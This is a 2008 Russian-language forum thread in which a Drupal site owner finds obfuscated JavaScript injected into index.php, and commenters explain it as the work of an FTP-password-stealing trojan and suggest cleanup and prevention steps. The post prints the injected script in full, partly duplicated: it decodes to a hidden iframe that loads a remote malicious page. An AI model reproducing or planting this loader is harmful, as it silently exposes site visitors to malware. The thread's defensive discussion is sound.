24 июля 2008 в 9:42
Сегодня с утра зашел на сайт и увидел такое:
Parse error: syntax error, unexpected '<' in /home/*/*/*/index.php on line 37
Полез в код index.php, в итоге
в строке 37 обнаружил следующий код:
drupal_page_footer();<!-- o --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109100114101097109046110101116047';
s=s+'103112051047105110100101120046112104112034032119105100116104061051032104101105103104116061051032115';
s=s+'116121108101061034100105115112108097121058110111110101034062060047073070082065077069062032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c -->
s+='060073070082065077069032115114099061034104116116112058047047115105109100114101097109046110101116047';
s=s+'103112051047105110100101120046112104112034032119105100116104061051032104101105103104116061051032115';
s=s+'116121108101061034100105115112108097121058110111110101034062060047073070082065077069062032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c -->
в оригинальном файле код был другой
Что за скрипт такой, файл был изменен сегодняшним числом...причем я ничего не трогал и на фтп не заходил.
Я в расстерянности.
Комментарии
Однако вирусня...
Это вирус, на компе,
скорее всего пароли забиты в тотал коммандер - оттуда их ворует вирус
меняйте пароли, шерстите все файлы с текстом *index* (даже html), куда есть доступ с тотал-коммандера (с забитыми в него паролями)
вычищайете эти яваскрипты, проверяйте каталоги на новые (обновленные) файлы-
В том же коммандаре можно отсортировать по дате
И не храните пароли в коммандаре, забивайте руками при фтп-соединенни
P.S. Сам так попал, замучился vbulletin очищать (там в каждой папке по index.php, нашел также не мой файл)
Точно?
Как бороться?
Я тупо код это стер, но как обезопаситься в дальнейшем?
Коммандером не пользуюсь, CuteFTP
в CuteFTP - не знаю, там как то вроде возможно шифровать
но не уверен, что это по умолчанию
Но то что пароли ушли - это точно
меняйте пароли и пока не разберетесь, храните в текстовом файле
эхх, ок
заодно проверю полностью на вирусы
не хранить пароли в тотал коммандере
обновлять антивирусник
у меня была такая же проблема. а чуть с ума не сошла.
хорошо в рбк-хостинг был архив сайта с базой. они его откуда-то достали и все заново переставили.
тотал не тотал...
в момент коннекта пароли передаются в НЕ зашифрованном виде
как выход поставить тотал, потом перенисти его файлы в другую не дефолтную папку, если вирус не будет знать где тотал то и пароль не сможет забрать, но если вирус будет снифить трафик то в момент коннекта по фтп (любой прогой) он сможет забрать пароль
мораль: переносить файлы тотала, юзать антивиръ и фаерволъ
+ еще хостинг с поддержкой SSH (SFTP) не помешает, ИМХО.
вирус однозначно
принцип примерно таковой:
1. Мой девственный компутер, через IE скушал с зараженного таким образом сайта (неизвестно какого) троян по именем Downloader.JS* (существуют вариации).
2. Он в свою очередь незамедлительно начал свою работу по сбору паролей фтп.
3. Далее не знаю, может их он складывал в удаленную базу.
4. Потом с помощью паролей и скрипта на сервере удаленном в конец файлов index.* добавлялись такие строки.
В общем не я первый, и вирус старый. Вопрос в том, почему его антивирусы не ловят.
с антивирусами да, странно, у меня стоял доктор веб (лицензионный)
тот же доктор стоит.
теперь надо поробовать что нибудь другое, доктор его напрочь не видит
Если на хостинге есть возможность, не пользоваться FTP, а пользоваться SSH/SFTP.
Плюс друпальских правил оформления исходного кода - нет закрывающей ?> в конце PHP-скриптов, поэтому тупые яваскриптовые вирусы рушат программу и вызывают ошибку на сайте. По-моему это лучше, чем сайт с вирусом на главной странице.
не пользоваться микрософтами - вирусы в них были с начала и на сегодня благодаря им мы имеем проблему спама из зомби-сетей на взломанных виндовсах, дос-атаки и взломы сайтов через украденные ftp пароли - очевидно что дальше будет только хуже